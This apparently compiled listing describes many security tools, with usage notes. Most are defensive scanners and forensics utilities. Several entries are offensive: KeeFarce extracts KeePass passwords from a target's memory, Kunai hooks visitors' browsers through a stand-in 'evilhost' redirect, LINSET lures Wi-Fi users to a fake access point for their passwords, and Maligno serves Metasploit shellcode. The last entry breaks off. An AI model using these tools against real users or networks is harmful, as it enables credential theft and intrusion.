KeeFarce - Extracts Passwords From A Keepass 2.X Database, Directly From Memory



KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and url's are dumped into a CSV file in %AppData%

General Design
KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the dot net runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).
The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass processes heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages
An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing
In order to execute on the target host, the following files need to be in the same folder:
  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll
Copy these files across to the target and execute KeeFarce.exe

Building
Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility
KeeFarce has been tested on:
  • KeePass 2.28, 2.29 and 2.30 - running on Windows 8.1 - both 32 and 64 bit.
This should also work on older Windows machines (win 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment before hand is recommended.

Acknowledgements
  • Sharp Needle by Chad Zawistowski was used for the DLL injection tesh.
  • Code by Alois Kraus was used to get the pointer to object C# voodoo working.


Download KeeFarce

KeyBox - A web-based SSH console that centrally manages administrative access to systems


KeyBox is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of user's public SSH keys. Key management and administration is based on profiles assigned to defined users.

Administrators can login using two-factor authentication with FreeOTP or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web-shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.

KeyBox layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: The Security Implications of SSH. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

Prerequisites

To Run Bundled with Jetty

If you're not big on the idea of building from source...
Download keybox-jetty-vXX.XX.tar.gz
https://github.com/skavanagh/KeyBox/releases
Export environment variables
for Linux/Unix/OSX
 export JAVA_HOME=/path/to/jdk
 export PATH=$JAVA_HOME/bin:$PATH
for Windows
 set JAVA_HOME=C:\path\to\jdk
 set PATH=%JAVA_HOME%\bin;%PATH%
Start KeyBox
for Linux/Unix/OSX
    ./startKeyBox.sh
for Windows
    startKeyBox.bat
How to Configure SSL in Jetty (it is a good idea to add or generate your own unique certificate)
http://wiki.eclipse.org/Jetty/Howto/Configure_SSL

Using KeyBox

Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme

Steps:
  1. Create systems
  2. Create profiles
  3. Assign systems to profile
  4. Assign profiles to users
  5. Users can login to create sessions on assigned systems
  6. Start a composite SSH session or create and execute a script across multiple sessions
  7. Add additional public keys to systems
  8. Disable any adminstrative public key forcing key rotation.
  9. Audit session history

Download KeyBox

King Phisher - Phishing Campaign Toolkit


King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. It features an easy to use, yet very flexible architecture allowing full control over both emails and server content. King Phisher can be used to run campaigns ranging from simple awareness training to more complicated scenarios in which user aware content is served for harvesting credentials.

King Phisher is only to be used for legal applications when the explicit permission of the targeted organization has been obtained.


Why Use King Phisher

Fully Featured And Flexible

King Phisher was created out of a need for an application that would facilitate running multiple separate campaigns with different goals ranging from education, credential harvesting and so called "Drive By" attacks. King Phisher has been used to run campaigns ranging from hundreds of targets to tens of thousands of targets with ease. It also supports sending messages with embedded images and determining when emails are opened with a tracking image.

Integrated Web Server

King Phisher uses the packaged web server that comes standard with Python making configuring a separate instance unnecessary.

Open Source

The Python programming language makes it possible to modify the King Phisher source code to suite the specific needs of the user. Alternatively end users not interested in modifying the source code are welcome to open an issue and request a feature. Users are able to run campaigns as large as they like, as often as they like.

No Web Interface

No web interface makes it more difficult for prying eyes to identify that the King Phisher server is being used for social engineering. Additionally the lack of a web interface reduces the exposure of the King Phisher operator to web related vulnerabilities such as XSS.


Download King Phisher

Kunai - Pwning & Info Gathering via User Browser



Sometimes there is a need to obtain ip address of specific person or perform client-side attacks via user browser. This is what you need in such situations.

Kunai is a simple script which collects many informations about a visitor and saves output to file; furthermore, you may try to perform attacks on user browser, using beef or metasploit.

In order to grab as many informations as possible, script detects whenever javascript is enabled to obtain more details about a visitor. For example, you can include this script in iframe, or perform redirects, to avoid detection of suspicious activities. Script can notify you via email about user that visit your script. Whenever someone will visit your hook (kunai), output fille will be updated.

Functions
  • Stores informations about users in elegant output
  • Website spoofing
  • Redirects
  • BeEF & Metasploit compatibility
  • Email notification
  • Diffrent reaction for javascript disabled browser
  • One file composition

Example configs
  • Website spoofing (more stable & better for autopwn & beef):
  • Redirect (better for quick ip catching):
goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png
  • Cross Site Scripting (inclusion)

LiME - Linux Memory Extractor


A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android. This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Features
  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint

Usage
Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.
LiME utilizes the insmod command to load the module, passing required arguments for its execution.
insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
        tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
        padded ~ pads all non-System RAM ranges with 0s
        lime ~ each range prepended with fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
        0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp to only listen on localhost, 0 binds on all interfaces (default)

Examples
In this example we use adb to load LiME and then start it with acquisition performed over the network
$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"
Now on the host machine, we can establish the connection and acquire memory using netcat
$ nc localhost 4444 > ram.lime
Acquiring to sdcard
# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"


Download Lime

LINSET - WPA/WPA2 Hack Without Brute Force


How it works
  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • We choose one of several web interfaces tailored for me (thanks to the collaboration of the users)
  • Mounts one FakeAP imitating the original
  • A DHCP server is created on FakeAP
  • It creates a DNS server to redirect all requests to the Host
  • The web server with the selected interface is launched
  • The mechanism is launched to check the validity of the passwords that will be introduced
  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
  • The attack will stop after the correct password checking
Are necessary tengais installed dependencies, which Linset check and indicate whether they are installed or not.

It is also preferable that you still keep the patch for the negative channel, because if not, you will have complications relizar to attack correctly

How to use
$ chmod +x linset
$ ./linset


Download LINSET

LMD - Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches, they are also easily exported to any number of detection tools such as ClamAV.

The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments.

The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform.

The commercial products available for malware detection and remediation in multi-user shared environments remains abysmal. An analysis of 8,883 malware hashes, detected by LMD 1.5, against 30 commercial anti-virus and malware products paints a picture of how poorly commercial solutions perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931
Using the Team Cymru malware hash registry, we can see that of the 8,883 malware hashes shipping with LMD 1.5, there was 6,931 or 78% of threats that went undetected by 30 commercial anti-virus and malware products. The 1,951 threats that were detected had an average detection rate of 58% with a low and high detection rate of 10% and 100% respectively. There could not be a clearer statement to the need for an open and community driven malware remediation project that focuses on the threat landscape of multi-user shared environments.

Features:
  • MD5 file hash detection for quick threat identification
  • HEX based pattern matching for identifying threat variants
  • statistical analysis component for detection of obfuscated threats (e.g: base64)
  • integrated detection of ClamAV to use as scanner engine for improved performance
  • integrated signature update feature with -u|–update
  • integrated version update feature with -d|–update-ver
  • scan-recent option to scan only files that have been added/changed in X days
  • scan-all option for full path based scanning
  • checkout option to upload suspected malware to rfxn.com for review / hashing
  • full reporting system to view current and previous scan results
  • quarantine queue that stores threats in a safe fashion with no permissions
  • quarantine batching option to quarantine the results of a current or past scans
  • quarantine restore option to restore files to original path, owner and perms
  • quarantine suspend account option to Cpanel suspend or shell revoke users
  • cleaner rules to attempt removal of malware injected strings
  • cleaner batching option to attempt cleaning of previous scan reports
  • cleaner rules to remove base64 and gzinflate(base64 injected malware
  • daily cron based scanning of all changes in last 24h in user homedirs
  • daily cron script compatible with stock RH style systems, Cpanel & Ensim
  • kernel based inotify real time file scanning of created/modified/moved files
  • kernel inotify monitor that can take path data from STDIN or FILE
  • kernel inotify monitor convenience feature to monitor system users
  • kernel inotify monitor can be restricted to a configurable user html root
  • kernel inotify monitor with dynamic sysctl limits for optimal performance
  • kernel inotify alerting through daily and/or optional weekly reports
  • e-mail alert reporting after every scan execution (manual & daily)
  • path, extension and signature based ignore options
  • background scanner option for unattended scan operations
  • verbose logging & output of all actions


Source Data:
The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating.

There are four main sources for malware data that is used to generate LMD signatures:
Network Edge IPS: Through networks managed as part of my day-to-day job, primarily web hosting related, our web servers receive a large amount of daily abuse events, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates:
The LMD signature are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the –update option, which can be run manually at any time.

An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914) signatures, before any updates. The top 60 threats by prevalence detected by LMD are as follows:
base64.inject.unclassed     perl.ircbot.xscan
bin.dccserv.irsexxy         perl.mailer.yellsoft
bin.fakeproc.Xnuxer         perl.shell.cbLorD
bin.ircbot.nbot             perl.shell.cgitelnet
bin.ircbot.php3             php.cmdshell.c100
bin.ircbot.unclassed        php.cmdshell.c99
bin.pktflood.ABC123         php.cmdshell.cih
bin.pktflood.osf            php.cmdshell.egyspider
bin.trojan.linuxsmalli      php.cmdshell.fx29
c.ircbot.tsunami            php.cmdshell.ItsmYarD
exp.linux.rstb              php.cmdshell.Ketemu
exp.linux.unclassed         php.cmdshell.N3tshell
exp.setuid0.unclassed       php.cmdshell.r57
gzbase64.inject             php.cmdshell.unclassed
html.phishing.auc61         php.defash.buno
html.phishing.hsbc          php.exe.globals
perl.connback.DataCha0s     php.include.remote
perl.connback.N2            php.ircbot.InsideTeam
perl.cpanel.cpwrap          php.ircbot.lolwut
perl.ircbot.atrixteam       php.ircbot.sniper
perl.ircbot.bRuNo           php.ircbot.vj_denie
perl.ircbot.Clx             php.mailer.10hack
perl.ircbot.devil           php.mailer.bombam
perl.ircbot.fx29            php.mailer.PostMan
perl.ircbot.magnum          php.phishing.AliKay
perl.ircbot.oldwolf         php.phishing.mrbrain
perl.ircbot.putr4XtReme     php.phishing.ReZulT
perl.ircbot.rafflesia       php.pktflood.oey
perl.ircbot.UberCracker     php.shell.rc99
perl.ircbot.xdh             php.shell.shellcomm


Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with:
http://www.rfxn.com/upgrade-centos-4-8-to-5-3/

There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES.
       e.g: maldet --monitor users
       e.g: maldet --monitor /root/monitor_paths
       e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then the users webdir, if it exists, will only be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor

Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage.


Download LMD

Loki - Scanner for Simple Indicators of Compromise


Simple IOC Scanner

Detection is based on four detection methods:
1. File Name IOC
   Regex match on full file path/name

2. Yara Rule Check
   Yara signature match on file data and process memory

3. Hash check
   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
The Windows binary is compiled with PyInstaller 2.1 and should run as x86 application on both x86 and x64 based systems.

Run
  • Download the program archive via the button "Download ZIP" on the right sidebar
  • Unpack LOKI locally
  • Provide the folder to a target system that should be scanned: removable media, network share, folder on target system
  • Right-click on loki.exe and select "Run as Administrator" or open a command line "cmd.exe" as Administrator and run it from there (you can also run LOKI without administrative privileges but some checks will be disabled and relevant objects on disk will not be accessible)

Reports
  • The resulting report will show a GREEN, YELLOW or RED result line.
  • Please analyse the findings yourself by:
    1. uploading non-confidential samples to Virustotal.com
    2. Search the web for the filename
    3. Search the web for keywords from the rule name (e.g. EQUATIONGroupMalware_1 > search for "Equation Group")
    4. Search the web for the MD5 hash of the sample
  • Please report back false positives via the "Issues" section, which is accessible via the right sidebar (mention the false positive indicator like a hash and/or filename and the rule name that triggered)

Usage

usage: loki.exe [-h] [-p path] [-s kilobyte] [--printAll] [--noprocscan]
                [--nofilescan] [--noindicator] [--debug]

Loki - Simple IOC Scanner

optional arguments:
  -h, --help     show this help message and exit
  -p path        Path to scan
  -s kilobyte    Maximum file site to check in KB (default 2000 KB)
  --printAll     Print all files that are scanned
  --noprocscan   Skip the process scan
  --nofilescan   Skip the file scan
  --noindicator  Do not show a progress indicator
  --debug        Debug output


Download Loki

LUKS-OPs - Automate the usage of LUKS volumes in Linux


A bash script to automate the most basic usage of LUKS volumes in Linux. Like:
  • Creating a virtual disk volume with LUKS format.
  • Mounting an existing LUKS volume
  • Unmounting a Single LUKS volume or all LUKS volume in the system.
Basic Usage

There is an option for a menu:
./luks-ops.sh menu or simply ./luks-ops.sh

Other options include:
./luks-ops.sh new disk_Name Size_in_numbers
./luks-ops.sh mount /path/to/device (mountpoint) 
./luks-ops.sh unmount-all
./luks-ops.sh clean
./luks-ops.sh usage

Default Options:
  • Virtual-disk size = 512 MB and it's created on /usr/ directory
  • Default filesystem used = ext4
  • Cipher options:
    • Creating LUKS1: aes-xts-plain64, Key: 256 bits, LUKS header hashing: sha1, RNG: /dev/urandom
    • plain: aes-cbc-essiv:sha256, Key: 256 bits, Password hashing: ripemd160 (about-time :D)
  • Mounting point = /media/luks_* where * is random-string.
  • Others.. NB. You can change /dev/urandom to /dev/zero (speed?)
Dependencies (Install applications:)
  1. dmsetup --- low level logical volume management
  2. cryptsetup --- manage plain dm-crypt and LUKS encrypted volumes

Download LUKS-OPs

Lynis 2.0.0 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Primary goal is to help users with auditing and hardening of Unix and Linux based systems. The software is very flexible and runs on almost every Unix based system (including Mac). Even the installation of the software itself is optional!

How it works

Lynis will perform hundreds of individual tests to determine the security state of the system. Many of these tests are also part of common security guidelines and standards. Examples include searching for installed software and determine possible configuration flaws. Lynis goes further and does also test individual software components, checks related configuration files and measures performance. After these tests, a scan report will be displayed with all discovered findings.

Typical use cases for Lynis:
  • Security auditing
  • Vulnerability scanning
  • System hardening

Requirements:
Privileged or non-privileged


Lynis 2.1.0 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

No installation required

The tool is very flexible and easy to use. It is one of the few tools, in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
During the scan, technical details about the scan are stored in a log file. At the same time findings (warnings, suggestions, data collection), are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Comparison with other tools

Lynis has a different way of doing things, so you have more flexibility. After all, you should be the one deciding what security controls make sense for your environment. We have a small comparison with some other well known tools:

Bastille Linux

Bastille was for a long time the best known utility for hardening Linux systems. It focuses mainly on automatically hardening the system.
Differences with Bastille
Automated hardening tools are helpful, but at the same time might give a false sense of security. Instead of just turning on some settings, Lynis perform an in-depth security scan. You are the one to decide what level of security is appropriate for your environment. After all, not all systems have to be like Fort Knox, unless you want it to be.

Benefits of Lynis
  • Supports more operating systems
  • Won't break your system
  • More in-depth audit


OpenVAS / Nessus

These products focus primarily on vulnerability scanning. They do this via the network by polling services. Optionally they will log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper analysis compared with network based scans. Additionally, there is no risk for your business processes, and log files remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover vulnerabilities as well. It does so by using existing tools and analyzing configuration files.
Lynis and OpenVAS are both open source and free to use. Nessus is a closed source and paid.

Benefits of Lynis
  • Much faster
  • No pollution of log files, no disruption to business services
  • Host based scans provides more in-depth audit

Changelog
Lynis 2.1.0
 = Lynis 2.1.0 (2015-04-16) =

General:
---------
Screen output has been improved to provide additional information.

OS support:
------------
CUPS detection on Mac OS has been improved. AIX systems will now use csum
utility to create host ID. Group check have been altered on AIX, to include
the -n ALL. Core dump check on Linux is extended to check for actual values
as well.

Software:
----------
McAfee detection has been extended by detecting a running cma binary.
Improved detection of pf firewall on BSD and Mac OS. Security patch checking
with zypper extended.

Session timeout:
-----------------
Tests to determine shell time out setting have been extended to account for
AIX, HP-UX and other platforms. It will now determine also if variable is
exported as a readonly variable. Related compliance section PCI DSS 8.1.8
has been extended.

Documentation:
---------------
- New document: Getting started with Lynis
https://cisofy.com/documentation/lynis/get-started/

Plugins (Enterprise):
----------------------
- Update to file integrity plugin
Changes to PLGN-2606 (capabilities check)

- New configuration plugins:
PLGN-4802 (SSH settings)
PLGN-4804 (login.defs)


Download Lynis 2.1.0

Lynis 2.1.1 - Security Auditing Tool for Unix/Linux Systems


Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

No installation required

The tool is very flexible and easy to use. It is one of the few tools, in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
During the scan, technical details about the scan are stored in a log file. At the same time findings (warnings, suggestions, data collection), are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Parameters
--auditor "Given name Surname"     Assign an auditor name to the audit (report)
--checkall  -c  Start the check
--check-update     Check if Lynis is up-to-date
--cronjob     Run Lynis as cronjob (includes -c -Q)
--help  -h  Shows valid parameters
--manpage     View man page
--nocolors     Do not use any colors
--pentest     Perform a penetration test scan (non-privileged)
--quick  -Q  Don't wait for user input, except on errors
--quiet     Only show warnings (includes --quick, but doesn't wait)
--reverse-colors   Use a different color scheme for lighter backgrounds
--version  -V  Check program version (and quit)

Changelog
Lynis 2.1.1
=  Lynis 2.1.1 (2015-07-22)  =

    This release adds a lot of improvements, with focus on performance, and
    additional support for common Linux distributions and external utilities.
    We recommend to use this latest version.

    * Operating system enhancements
    -------------------------------
    Support for systems like CentOS, openSUSE, Slackware is improved.

    * Performance
    -------------
    Performance tuning has been applied, to speed up execution of the audit on
    systems with many files. This also includes code cleanups.

    * Automatic updates
    -------------------
    Initial work on an automatic updater has been implemented. This way Lynis
    can be scheduled for automatic updating from a trusted source.

    * Internal functions
    --------------------
    Not all systems have readlink, or the -f option of readlink. The
    ShowSymlinkPath function has been extended with a Python based check, which
    is often available.

    * Software support
    ------------------
    Apache module directory /usr/lib64/apache has been added, which is used on
    openSUSE.

    Support for Chef has been added.

    Added tests for CSF's lfd utility for integrity monitoring on directories and
    files. Related tests are FINT-4334 and FINT-4336.

    Added support for Chrony time daemon and timesync daemon. Additionally NTP
    sychronization status is checked when it is enabled.

    Improved single user mode protection on the rescue.service file.

    * Other
    -------
    Check for user permissions has been extended.
    Python binary is now detected, to help with symlink detection.
    Several new legal terms have been added, which are used for usage in banners.
    In several files old tests have been removed, to further clean up the code.

    * Bug fixes
    ---------
    Nginx test showed error when access_log had multiple parameters.
    Tests using locate won't be performed if not present.
    Fix false positive match on Squid unsafe ports [SQD-3624].
    The hardening index is now also inserted into the report if it is not displayed
    on screen.

    * Functions
    ---------
    Added AddSystemGroup function

    * New tests
    ---------
    Several new tests have been added:

    [PKGS-7366] Scan for debsecan utility on Debian systems
    [PKGS-7410] Determine amount of installed kernel packages
    [TIME-3106] Check synchronization status of NTP on systemd based systems
    [CONT-8102] Docker daemon status and gather basic details
    [CONT-8104] Check docker info for any Docker warnings
    [CONT-8106] Check total, running and unused Docker containers

    * Plugins
    ---------

    [PLGN-2602] Disabled by default, as it may be too slow for some machines
    [PLGN-3002] Extended with /sbin/nologin

    * Documentation
    ---------------
    A new document has been created to help with the process of upgrading Lynis.
    It is available at https://cisofy.com/documentation/lynis/upgrading/

  --------------------------------------------------------------


Download Lynis 2.1.1

MALHEUR - Automatic Analysis of Malware Behavior

A novel tool for malware analysis

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.


Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It supports four basic actions for analysis which can be applied to reports of recorded behavior:
  1. Extraction of prototypes: From a given set of reports, malheur identifies a subset of prototypes representative for the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.
  2. Clustering of behavior Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.
  3. Classification of behavior: Based on a set of previously clustered reports, malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel and unknown variants of malware and can be used to filter program behavior prior to manual inspection.
  4. Incremental analysis: Malheur can be applied incrementally for analysis of large data sets. By processing reports in chunks, the run-time as well as memory requirements can be significantly reduced. This renders long-term application of malheur feasible, for example for daily analysis of incoming malware programs.

Dependencies

Debian & Ubuntu Linux
The following packages need to be installed for compiling Malheur on Debian and Ubuntu Linux
gcc
libconfig9-dev
libarchive-dev
For bootstrapping Malheur from the GIT repository or manipulating the automake/autoconf configuration, the following additional packages are necessary.
automake
autoconf
libtool

Mac OS X
For compiling Malheur on Mac OS X a working installation of Xcode is required including gcc. Additionally, the following packages need to be installed via Homebrew
libconfig
libarchive (from homebrew-alt)

OpenBSD
For compiling Malheur on OpenBSD the following packages are required. Note that you need to use gmake instead of make for building Malheur.
gmake
libconfig
libarchive
For bootstrapping Malheur from the GIT repository, the following packages need be additionally installed
autoconf
automake
libtool

Compilation & Installation

From GIT repository first run
$ ./bootstrap
From tarball run
$ ./configure [options]
$ make
$ make check
$ make install
Options for configure
--prefix=PATH           Set directory prefix for installation
By default Malheur is installed into /usr/local. If you prefer a different location, use this option to select an installation directory.


Download MALHEUR

Maligno v2.0 - Metasploit Payload Server


Maligno is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded prior to transmission.
Maligno also comes with a client tool, which supports HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.

The client-server communications can be configured in a way that allows you to simulate specific C&C communications or targeted attacks. In other words, the tool can be used as part of adversary replication engagements.

Are you new to Maligno? Check Maligno Video Series with examples and tutorials.


Changelog: Adversary replication functionality improvements. POST and HEAD method support added, new client profile added, server multithreading support added, perpetual shell mode added, client static HTTP(S) proxy support added, documentation and stability improvements.

Important: Configuration files or profiles made for Maligno v1.x are not compatible with Maligno v2.0.


MalwaRE - Malware Repository Framework


malwaRE is a malware repository website created using PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of Adlice team with some extra features.

If you guys have any improvements, please let me know or send me a pull request.

Features
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal's score column)
  • Download samples from repository

MassBleed - Mass SSL Vulnerability Scanner


USAGE
 sh massbleed.sh [CIDR|IP] [single|port|subnet] [port] [proxy]

ABOUT
